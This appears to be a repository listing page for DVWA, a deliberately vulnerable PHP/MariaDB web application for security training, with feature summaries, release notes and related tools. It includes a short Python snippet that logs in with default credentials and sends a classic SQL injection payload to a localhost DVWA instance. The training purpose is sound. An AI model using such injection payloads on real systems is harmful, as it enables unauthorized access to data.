DVWA: Deliberately vulnerable web application for security training
PHP/MariaDB training platform for web security exploitation practice.
Learn more about DVWA
DVWA is a PHP-based web application backed by MariaDB that contains documented and undocumented security vulnerabilities across multiple difficulty levels. The application runs on standard web server stacks like XAMPP and is designed to be deployed in isolated environments such as virtual machines with NAT networking. It implements common web vulnerabilities including SQL injection, cross-site scripting, authentication bypass, and other OWASP-related issues with adjustable complexity settings. The tool serves as a practice platform for security professionals, developers learning secure coding practices, and students in classroom settings studying web application security.
Adjustable Difficulty Levels
Vulnerabilities scale across multiple difficulty settings from low to high complexity. Enables progressive learning paths for beginners through advanced security practitioners without requiring separate environments.
Undocumented Vulnerability Discovery
Contains intentional security flaws beyond the documented exercises, requiring active reconnaissance and analysis. Simulates real-world penetration testing scenarios where not all vulnerabilities are explicitly cataloged.
Isolated Deployment Model
Architected exclusively for VM-based isolated environments with explicit network isolation requirements. Prevents accidental internet exposure of vulnerable code through clear deployment constraints and security warnings.
import requests
# Test SQL injection vulnerability (low security)
session = requests.Session()
login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}
session.post('http://localhost/DVWA/login.php', data=login_data)
# Exploit SQLi to extract data
payload = "1' OR '1'='1"
response = session.get('http://localhost/DVWA/vulnerabilities/sqli/', params={'id': payload, 'Submit': 'Submit'})
print(response.text)Introduces a new OpenAPI module for testing vulnerable API endpoints; release notes do not specify breaking changes or upgrade requirements.
- –Explore the new OpenAPI module to practice identifying and exploiting API vulnerabilities in a controlled environment.
- –Review module documentation for setup steps, as release notes omit configuration details and dependency requirements.
A new crypto module is now available in the main branch; release notes do not specify breaking changes or upgrade requirements.
- –Review the merged crypto module for new cryptographic functionality in your DVWA deployment.
- –Check application code for integration points if you rely on custom cryptographic operations.
Adds built-in container support for easier deployment; release notes do not specify breaking changes or requirements.
- –Deploy DVWA using new built-in container configurations contributed by @hoang-himself.
- –Review container setup documentation as migration steps and compatibility details are not provided in release notes.
See how people are using DVWA
Top in Security
Related Repositories
Discover similar tools and frameworks used by developers
fail2ban
Log-based intrusion prevention via dynamic firewall management.
semgrep
Pattern-based code scanner for 30+ languages.
CyberChef
Browser-based data transformation tool with chainable operations.
fingerprintjs
Client-side JavaScript library for browser fingerprinting and visitor identification.
httpx
Fast HTTP probing with response metadata extraction.